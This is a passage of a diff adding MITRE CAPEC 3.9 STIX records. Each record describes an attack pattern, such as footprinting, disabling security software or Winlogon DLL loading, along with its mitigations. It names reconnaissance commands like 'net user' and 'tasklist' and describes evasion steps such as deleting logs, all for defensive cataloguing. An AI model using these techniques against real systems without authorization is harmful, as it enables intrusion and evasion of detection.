"attack-pattern--b5b3a4ff-afa0-4a3a-9537-88ac953a41f7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Process Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "On a Windows system, the command, \"tasklist,\" displays information about processes. The same function on a Mac OS system is done with the command, \"ps.\"", + "In addition to manual discovery of running processes, an adversary can develop malware that carries out this attack pattern before subsequent malicious action." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d90ebca8-a2a7-44f1-afb0-5bf198b230a1", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--df51abec-081d-46dd-8f72-6ffd3d11d3dc", + "target_ref": "attack-pattern--b5b3a4ff-afa0-4a3a-9537-88ac953a41f7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the services on the target system to an authorized user. By knowing what services are registered on the target system, the adversary can learn about the target environment as a means towards further malicious behavior. Depending on the operating system, commands that can obtain services information include \"sc\" and \"tasklist/svc\" using Tasklist, and \"net start\" using Net.", + "external_references": [ + { + "external_id": "CAPEC-574", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/574.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "System Service Discovery", + "external_id": "T1007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1007" + } + ], + "id": "attack-pattern--6cfc4047-a0fb-42ac-bf94-226a21c40c80", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Services Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire service information and block them by using a software restriction policy or tools that restrict program execution by uaing a process allowlist.", + "id": "course-of-action--93c5a458-1b46-4c3f-9f1f-763513e4e117", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-574-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ae71c8b1-867e-4d0f-b856-1f1dc4334311", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93c5a458-1b46-4c3f-9f1f-763513e4e117", + "target_ref": "attack-pattern--6cfc4047-a0fb-42ac-bf94-226a21c40c80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the domain accounts and their permissions on the target system to an authorized user. By knowing what accounts are registered on the target system, the adversary can inform further and more targeted malicious behavior. Example Windows commands which can acquire this information are: \"net user\" and \"dsquery\".", + "external_references": [ + { + "external_id": "CAPEC-575", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/575.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Account Discovery", + "external_id": "T1087", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1087" + } + ], + "id": "attack-pattern--6de257d8-e3b6-4654-85a7-a6fb37a94ccb", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Account Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire account information and block them by using a software restriction policy or tools that restrict program execution by uysing a process allowlist.", + "id": "course-of-action--99081e9b-3b17-47c0-bbc3-23ef66bd5063", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-575-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a83980a6-7bad-41f4-967c-54f888a25a11", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--99081e9b-3b17-47c0-bbc3-23ef66bd5063", + "target_ref": "attack-pattern--6de257d8-e3b6-4654-85a7-a6fb37a94ccb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about user groups and their permissions on the target system to an authorized user. By knowing what users/permissions are registered on the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command which can list local groups is \"net localgroup\".", + "external_references": [ + { + "external_id": "CAPEC-576", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/576.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Permission Groups Discovery", + "external_id": "T1069", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1069" + }, + { + "description": "Group Policy Discovery", + "external_id": "T1615", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1615" + } + ], + "id": "attack-pattern--f95027a2-27e7-431f-b5c7-da9c46b05f71", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Group Permission Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs (such as \"net\") that may be used to enumerate local group permissions and block them by using a software restriction Policy or tools that restrict program execution by using a process allowlist.", + "id": "course-of-action--2bb92dd6-4286-42f9-bb33-e90bf1a8a9d5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-576-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66551e96-dd41-445e-855d-1b22ca5c0267", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2bb92dd6-4286-42f9-bb33-e90bf1a8a9d5", + "target_ref": "attack-pattern--f95027a2-27e7-431f-b5c7-da9c46b05f71", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the primary users on the target system to an authorized user. They may do this, for example, by reviewing logins or file modification times. By knowing what owners use the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command that may accomplish this is \"dir /A ntuser.dat\". Which will display the last modified time of a user's ntuser.dat file when run within the root folder of a user. This time is synonymous with the last time that user was logged in.", + "external_references": [ + { + "external_id": "CAPEC-577", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/577.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "System Owner/User Discovery", + "external_id": "T1033", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1033" + } + ], + "id": "attack-pattern--3dfa08af-9677-4a4d-a3f0-a1c5042c9497", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Owner Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack.", + "Administrator permissions are required to view the home folder of other users." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that proper permissions on files and folders are enacted to limit accessibility.", + "id": "course-of-action--583c7488-8859-4641-9143-4a55cfb23722", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-577-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d75f4c7-4ed6-4b8d-92af-9a3ef1ed2ea7", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--583c7488-8859-4641-9143-4a55cfb23722", + "target_ref": "attack-pattern--3dfa08af-9677-4a4d-a3f0-a1c5042c9497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in access control to disable security tools so that detection does not occur. This can take the form of killing processes, deleting registry keys so that tools do not start at run time, deleting log files, or other methods.", + "external_references": [ + { + "external_id": "CAPEC-578", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/578.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Modify Authentication Process: Multi-Factor Authentication", + "external_id": "T1556.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1556/006" + }, + { + "description": "Impair Defenses: Disable or Modify Tools", + "external_id": "T1562.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/001" + }, + { + "description": "Impair Defenses: Disable Windows Event Logging", + "external_id": "T1562.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/002" + }, + { + "description": "Impair Defenses: Disable or Modify System Firewall", + "external_id": "T1562.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/004" + }, + { + "description": "Impair Defenses: Disable or Modify Cloud Firewall", + "external_id": "T1562.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/007" + }, + { + "description": "Impair Defenses: Disable Cloud Logs", + "external_id": "T1562.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/008" + }, + { + "description": "Impair Defenses: Safe Mode Boot", + "external_id": "T1562.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/009" + } + ], + "id": "attack-pattern--a2f42e82-a184-4df7-a8bb-6fc34787d571", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Disable Security Software", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_consequences": { + "Availability": [ + "Hide Activities (By disabling certain security tools, the adversary can hide malicious activity and avoid detection.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the capability to interact with the configuration of the targeted system." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Usable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are in place to prevent adversaries from altering the execution status of security tools.", + "id": "course-of-action--be1b899d-d3f2-4d8f-807f-c8a13d7c193c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-578-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--99491706-558f-487d-aa01-04a8b8b5a6f5", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1b899d-d3f2-4d8f-807f-c8a13d7c193c", + "target_ref": "attack-pattern--a2f42e82-a184-4df7-a8bb-6fc34787d571", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Winlogon is a part of Windows that performs logon actions. In Windows systems prior to Windows Vista, a registry key can be modified that causes Winlogon to load a DLL on startup. Adversaries may take advantage of this feature to load adversarial code at startup.", + "external_references": [ + { + "external_id": "CAPEC-579", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/579.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "Boot or Logon Autostart Execution: Winlogon helper DLL", + "external_id": "T1547.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547/004" + } + ], + "id": "attack-pattern--9927fda8-927b-4327-b3f8-bcbd0467c702", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Replace Winlogon Helper DLL", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Changes to registry entries in \"HKLM\\Software\\Microsoft\\Windows NT\\Winlogon\\Notify\" that do not correlate with known software, patch cycles, etc are suspicious. New DLLs written to System32 which do not correlate with known good software or patching may be suspicious.", + "id": "course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-579-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c9851cf-e6d2-463b-a389-c4c108572a95", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b", + "target_ref": "attack-pattern--9927fda8-927b-4327-b3f8-bcbd0467c702", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary identifies a Rest HTTP (Get, Put, Delete) style permission method allowing them to perform various malicious actions upon server data due to lack of access control mechanisms implemented within the application service accepting HTTP messages.", + "external_references": [ + { + "external_id": "CAPEC-58", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/58.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "external_id": "CWE-269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html" + }, + { + "description": "Mark O'Neill, Security for REST Web Services, Vprde;", + "external_id": "REF-463", + "source_name": "reference_from_CAPEC", + "url": "http://www.vordel.com/downloads/rsa_conf_2006.pdf" + } + ], + "id": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Restful Privilege Elevation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware", + "Software" + ], + "x_capec_example_instances": [ + "The HTTP Get method is designed to retrieve resources and not to alter the state of the application or resources on the server side. However, developers can easily code programs that accept a HTTP Get request that do in fact create, update or delete data on the server. Both Flickr (http://www.flickr.com/services/api/flickr.photosets.delete.html) and del.icio.us (http://del.icio.us/api/posts/delete) have implemented delete operations using standard HTTP Get requests. These HTTP Get methods do delete data on the server side, despite being called from Get which is not supposed to alter state." + ], + "x_capec_extended_description": "\n Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side. The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker needs to be able to identify HTTP Get URLs. The Get methods must be set to call applications that perform operations other than get such as update and delete." + ], + "x_capec_skills_required": { + "Low": "It is relatively straightforward to identify an HTTP Get method that changes state on the server side and executes against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8f217ad-8701-4a9c-9a22-a4c6022c4f51", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure that HTTP Get methods only retrieve state and do not alter state on the server side", + "id": "course-of-action--b77def1e-db69-4204-b59f-c9ba934af034", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-58-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--09b1f116-7e91-47fc-8238-758d20861790", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b77def1e-db69-4204-b59f-c9ba934af034", + "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure that HTTP methods have proper ACLs based on what the functionality they expose", + "id": "course-of-action--4f4d6165-fc50-42ef-9249-e1052676d841", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-58-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4a8f4717-a1fc-4334-8819-fadd7bafdf0f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f4d6165-fc50-42ef-9249-e1052676d841", + "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in active probing and exploration activities to determine security information about a remote target system. Often times adversaries will rely on remote applications that can be probed for system configurations.", + "external_references": [ + { + "external_id": "CAPEC-580", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/580.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-205", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/205.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "System Information Discovery", + "external_id": "T1082", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1082" + } + ], + "id": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "modified": "2023-01-24T00:00:00.000Z", + "name": "System Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e" + ], + "x_capec_prerequisites": [ + "The adversary must have logical access to the target network and system." + ], + "x_capec_skills_required": { + "Low": "The adversary needs to know basic linux commands." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5ec163f5-ff75-4e9d-ac8d-0bd09b3e9121", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7d31992-837d-4b43-91fb-5fd7cffc161b", + "target_ref": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b970172-c7e3-45aa-a1de-1362a7f5756c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "target_ref": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries may attempt to get a listing of security tools that are installed on the system and their configurations. This may include security related system features (such as a built-in firewall or anti-spyware) as well as third-party security software.", + "external_references": [ + { + "external_id": "CAPEC-581", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/581.html" + }, + { + "description": "Software Discovery:Security Software Discovery", + "external_id": "T1518.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1518/001" + } + ], + "id": "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Security Software Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": 